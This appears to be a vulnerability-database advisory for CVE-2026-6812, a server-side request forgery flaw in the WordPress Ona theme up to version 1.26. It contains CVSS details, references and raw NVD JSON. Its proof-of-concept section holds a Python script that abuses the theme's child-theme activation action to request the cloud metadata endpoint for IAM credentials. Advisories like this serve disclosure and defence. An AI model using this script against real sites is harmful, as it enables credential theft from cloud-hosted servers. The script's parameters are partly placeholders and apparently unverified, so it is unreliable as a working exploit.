Security Vulnerability Report
CVE-2026-6812 CVSS 4.4 MEDIUM

CVE-2026-6812

Published: 2026-05-02 06:16:04
Last Modified: 2026-05-05 19:16:18

Description

The Ona theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.26 via the ona_activate_child_theme. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score
4.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Ona Theme <= 1.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: WordPress Ona Theme SSRF via ona_activate_child_theme
# Date: 2026-05-02
# Vulnerable Parameter: URL used in theme activation

target_url = "http://target-wordpress-site.com/wp-admin/admin.php"
admin_cookie = "wordpress_logged_in_xxx=...; wordpress_sec_xxx=..."

# Malicious internal URL to query (e.g., AWS metadata)
payload_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

data = {
    "action": "ona_activate_child_theme",
    "theme_url": payload_url,
    "nonce": "wp_nonce_value",  # Requires valid admin nonce
}

headers = {
    "Cookie": admin_cookie,
    "Content-Type": "application/x-www-form-urlencoded",
}

# Send the request
response = requests.post(target_url, data=data, headers=headers)
print(f"Status Code: {response.status_code}")
print("Response body may contain leaked info or trigger timing attacks")

References

- https://plugins.trac.wordpress.org/browser/ona/tags/1.23.2/inc/admin/theme-admin.php#L688
- https://plugins.trac.wordpress.org/browser/ona/tags/1.23.2/inc/admin/theme-admin.php#L694
- https://plugins.trac.wordpress.org/browser/ona/trunk/inc/admin/theme-admin.php#L688
- https://plugins.trac.wordpress.org/browser/ona/trunk/inc/admin/theme-admin.php#L694
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0acb365c-b5f2-4377-875b-69278a8ff96e?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-6812",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-02T06:16:04.337",
    "lastModified": "2026-05-05T19:16:18.390",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Ona theme for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.26 via the ona_activate_child_theme. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 4.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-918"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/ona/tags/1.23.2/inc/admin/theme-admin.php#L688", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/ona/tags/1.23.2/inc/admin/theme-admin.php#L694", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/ona/trunk/inc/admin/theme-admin.php#L688", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/ona/trunk/inc/admin/theme-admin.php#L694", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0acb365c-b5f2-4377-875b-69278a8ff96e?source=cve", "source": "[email protected]"}
    ]
  }
}